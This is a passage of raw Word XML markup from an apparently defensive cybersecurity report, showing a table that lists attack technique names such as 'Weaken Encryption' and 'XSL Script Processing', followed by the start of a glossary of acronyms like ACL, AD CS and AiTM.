      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="03A1372F" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CE24618" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FA7BD0B"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510C1CEC" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58BE5FFA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A74D649" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F4D678B"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2789FBBE" w14:textId="663E2330" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Weaken Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="738B5CFF" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="447B8C96" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52CD2A56" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23DE08E6" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1808295D" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C27850B" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6327A992" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="0CAF866C" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E2C0B0D" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AB0BDFF" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="191" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1975DC65" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5994D2BA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D6500B6" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66D92978" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="582" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3418DB41" w14:textId="78D8E0FE" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>XSL Script Processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38A00D5A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="711" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F2D0D22" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E5DD095" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6017A816" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06984A88" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B700486" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="336A363D" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B49D821" w14:textId="77777777" w:rsidR="00505537" w:rsidRPr="001019D3" w:rsidRDefault="00505537" w:rsidP="00382BC6"/>
    <w:p w14:paraId="3BA36B01" w14:textId="40799D73" w:rsidR="001C03A4" w:rsidRPr="001019D3" w:rsidRDefault="001C03A4" w:rsidP="00382BC6">
      <w:pPr>
        <w:sectPr w:rsidR="001C03A4" w:rsidRPr="001019D3" w:rsidSect="004C32C3">
          <w:headerReference w:type="default" r:id="rId46"/>
          <w:footerReference w:type="default" r:id="rId47"/>
          <w:headerReference w:type="first" r:id="rId48"/>
          <w:footerReference w:type="first" r:id="rId49"/>
          <w:endnotePr>
            <w:numFmt w:val="lowerLetter"/>
          </w:endnotePr>
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape" w:code="9"/>
          <w:pgMar w:top="0" w:right="1021" w:bottom="0" w:left="1021" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="326"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F418714" w14:textId="77777777" w:rsidR="00012B64" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="004A6BBF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:ind w:left="590" w:hanging="590"/>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="_Toc212654672"/>
      <w:bookmarkStart w:id="217" w:name="_Toc156556658"/>
      <w:bookmarkStart w:id="218" w:name="_Toc213253579"/>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="146"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Annexes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
      <w:bookmarkEnd w:id="218"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="219" w:name="_Toc212654673"/>
    <w:bookmarkStart w:id="220" w:name="_Toc213253580"/>
    <w:p w14:paraId="5806DEA3" w14:textId="7A1E1611" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00012B64">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1124576775"/>
          <w:placeholder>
            <w:docPart w:val="0F733057730447D596BBFDBF11EF7A0F"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00630E88" w:rsidRPr="001019D3">
            <w:t>Glossary</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="219"/>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1866"/>
        <w:gridCol w:w="6880"/>
      </w:tblGrid>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="0841ADE4" w14:textId="77777777" w:rsidTr="002415FB">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A97F752" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="52F7D20A" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="7A568125" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5AB8B8A7" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ACL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7B90BAAD" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Access Control List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="6B78EE4A" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="63A563D9" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5AF45BF7" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Active Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="088FFEFD" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="195A8BBD" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AD CS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="41AF9911" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Active Directory Certificate Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="4030DD6D" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1735F346" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AiTM</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0BC28339" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>adversary-in-The-Middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="123593D3" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2DAB6F86" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3933" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="24E221C0" w14:textId="77777777" w:rsidR="00630E88" w:rsidRPr="001019D3" w:rsidRDefault="00630E88" w:rsidP="00012B64">
            <w:pPr>
              <w:pStyle w:val="Glossary"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="57" w:right="57" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Amazon Machine Image</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00630E88" w:rsidRPr="001019D3" w14:paraId="36239AD4" w14:textId="77777777" w:rsidTr="00012B64">
        <w:tc>
          <w:tcPr>
